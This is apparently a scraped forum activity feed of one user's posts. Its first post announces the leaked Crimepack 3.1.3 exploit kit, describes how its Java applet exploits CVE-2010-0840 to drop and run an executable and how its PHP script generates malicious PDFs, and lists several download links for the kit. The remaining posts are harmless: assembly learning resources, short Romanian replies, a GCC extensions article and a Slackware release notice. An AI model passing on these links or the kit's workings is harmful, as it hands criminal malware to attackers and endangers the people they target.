    Crimepack 3.1.3 Exploit kit Crimepack 3.1.3 Exploit kit Leaked, available for Download ! Part 1: Java Exploit As stated above, I focus on a malware that exploits a recent JRE vulnerability: CVE-2010-0840 to execute malicious files on a victim system. This malware comes inside a jar file, which contains the following two classes: Crimepack.class and KAVS.class. Part 1.1: Crimepack.class This class is the engine of the malware, it is obfuscated, but you can quickly strip off the obfuscation (my python beta tool is great…), once you get rid of the obfuscation you can see the following code: As always, we have an Applet that access to the data parameter, generates a random name for the exe payload that will be dropped in the system temp directory and then executed. So at this point as you can see we have nothing new, the above is a common Java downloader… but let’s scroll down: Above, we can see that the malware is creating a new instance of the KAVS class (description follows), in order to trigger the JRE vulnerability by using a call to the getValue() method (..snipped above..). Part 1.2: KAVS.class Here is the hand-crafted class, I say hand-crafted because such class cannot be compiled by using a standard compiler, so you have to edit the compiled class by editing the bytecode: Part 2: PDF-generator on demand The kit contains a nice php script that drops custom pdf on-demand, which means that you can have several mutations of the same piece of malware, by simply connecting to a malicious link. Download: http://www.multiupload.com/3HGKHWMRS5 Sursa: Crimepack 3.1.3 Exploit kit Leaked, available for Download ! ~ THN : The Hackers News Alternativ: http://www.speedyshare.com/files/28425214/Crimepack_3.1.3.zip http://www.megaupload.com/?d=THZ8OW23
  18. Nytro
    Assembley lanugage for Penetration Testers Assembley lanugage for Penetration tester Below are the useful resources to learn Assembley Language for pentesters to start learning Exploit writing Assembly - SkullSecurity Linux Assembley Linux Assembly Programming From the Ground Up Index of /releases/pgubook Iczelion’s Win32 Assembly Homepage Iczelion's Win32 Assembly Homepage Art of Assembly Art of Assembly Language Programming and HLA by Randall Hyde first 5 chapters is enough Intel Developer Manuals Intel® 64 and IA-32 Architectures Software Developer's Manuals Assembly Language Primer for Hackers Videos Assembly Primer for Hackers (Part 1) System Organization Assembly Primer For Hackers (Part 1) System Organization Assembly Primer for Hackers (Part 2) Virtual Memory Organization Assembly Primer For Hackers (Part 2) Virtual Memory Organization Assembly Primer for Hackers (Part 3) GDB Usage Primer Assembly Primer For Hackers (Part 3) Gdb Usage Primer Assembly Primer for Hackers (Part 4) Hello World Assembly Primer For Hackers (Part 4) Hello World Assembly Primer for Hackers (Part 5) Data Types Assembly Primer For Hackers (Part 5) Data Types Assembly Primer for Hackers (Part 6) Moving Data Assembly Primer For Hackers (Part 6) Moving Data Assembly Primer for Hackers (Part 7) Working with Strings Assembly Primer For Hackers (Part 7) Working With Strings Assembly Primer For Hackers (Part 8) Unconditional Branching Assembly Primer for Hackers (Part 9) Conditional Branching Assembly Primer For Hackers (Part 9) Conditional Branching Assembly Primer for Hackers (Part 10) Functions Assembly Primer For Hackers (Part 10) Functions Assembly Primer for Hackers (Part 11) Functions Stack Assembly Primer For Hackers (Part 11) Functions Stack Sursa: Assembley Language | Life of a Penetration Tester
  19. Nytro
    Sa decripteze sau sa crack-uiasca hash-uri ca md5?
  20. Nytro
    Eu o sa ajung pe la 8.
  21. Nytro
    Se incearca gasirea autorului in functie de modul in care acesta scrie codul. Se pare ca e profesionist, desigur... http://www.thehackernews.com/2011/05/fingerprinting-author-of-zeus-botnet.html
  22. Nytro
    Niciuna. Sunt prezentate niste extensii ale compilatorului GCC care fac viata mai usoara. Citeste macar o parte din articol. De exemplu sa definesti "1 ... 10" care sa reprezinte orice numar de la 1 la 10. Asta nu se poate in Visual C++ de exemplu si NU face parte din standardul C!
  23. Nytro
    nytro@rst:~$ ls -la /var/log/auth.log -rw-r--r-- 1 syslog adm 1516 2011-05-12 17:20 /var/log/auth.log Vad ca e "citibil" de catre oricine...
  24. Nytro
    GCC hacks in the Linux kernel Discover GCC extensions for the C language Skill Level: Intermediate M. Tim Jones Consultant Engineer Emulex Corp 18 Nov 2008 The Linux® kernel uses several special capabilities of the GNU Compiler Collection (GCC) suite. These capabilities range from giving you shortcuts and simplifications to providing the compiler with hints for optimization. Discover some of these special GCC features and learn how to use them in the Linux kernel. GCC and Linux are a great pair. Although they are independent pieces of software, Linux is totally dependent on GCC to enable it on new architectures. Linux further exploits features in GCC, called extensions, for greater functionality and optimization. This article explores many of these important extensions and shows you how they're used within the Linux kernel. GCC in its current stable version (version 4.3.2) supports three versions of the C standard: • The original International Organization for Standardization (ISO) standard of the C language (ISO C89 or C90) • ISO C90 with amendment 1 • The current ISO C99 (the default standard that GCC uses and that this article assumes) Note: This article assumes that you are using the ISO C99 standard. If you specify a standard older than the ISO C99 version, some of the extensions described in this article may be disabled. To specify the actual standard that GCC uses, you can use the -std option from the command line. Use the GCC manual to verify which extensions are supported in which versions of the standard (see Resources for a link). Applicable versions This article focuses on the use of GCC extensions in the 2.6.27.1 Linux kernel and version 4.3.2 of GCC. Each C extension refers to the file in the Linux kernel source where the example can be found. The available C extensions can be classified in several ways. This article puts them in two broad categories: • Functionality extensions bring new capabilities from GCC. • Optimization extensions help you generate more efficient code. Download: http://download.boulder.ibm.com/ibmdl/pub/software/dw/linux/l-gcc-hacks/l-gcc-hacks-pdf.pdf Online: http://www.ibm.com/developerworks/linux/library/l-gcc-hacks/index.html
  25. Nytro
    Slackware 13.37 It's true! Slackware 13.37 has been released. Nearly a year in the making, you will appreciate the performance and stability that can only come with careful and rigorous testing. Slackware 13.37 uses the 2.6.37.6 Linux kernel (hence our new $SLACKWARE_VERSION.$KERNEL_VERSION naming system used for this release ;-), and also ships with 2.6.38.4 kernels for those who want to run the latest (and also includes configuration files for 2.6.35.12 and 2.6.39-rc4). The long-awaited Firefox 4.0 web browser is included, the X Window System has been upgraded (and includes the open source nouveau driver for nVidia cards). The venerable Slackware installer has been improved as well, with support for installing to btrfs (for those who would like to try a new copy on write filesystem), a one-package-per-line display mode option, and alienBOB's big surprise: an easy to set up PXE install server that runs right off the DVD! More details may by found in the official announcement and in the release notes. For a complete list of included packages, see the package list. Please consider supporting the Slackware project by picking up a copy of the Slackware 13.37 release from the Slackware Store. The discs are off to replication, but we're accepting pre-orders for the official 6 CD set and the DVD. The CD set is the 32-bit x86 release, while the DVD is a dual-sided disc with the 32-bit x86 release on one side and the 64-bit x86_64 release on the other. And, we still have T-shirts (coming soon, a limited edition 13.37 release commemorative black T-shirt with the classic Slackware logo on the front, and a "leet" LILO bootscreen on the back) and other Slackware stuff there, so have a look around. Thanks to our subscribers and supporters for keeping Slackware going all these years. Thanks are again due to the Slackware crew, the developers of slackbuilds.org, the community on linuxquestions.org, Slackware IRC channels, and everyone else who helped out with this release. Have fun, and enjoy the new stable release! Pat and the Slackware crew Oh, in case our web server that's rather short of RAM goes down, try this link: 1337 Error +--------------------------+ Slackware 13.37 for ARM is also available. For details, see: start [slackware ARM] Sursa: The Slackware Linux Project
×
×
  • Create New...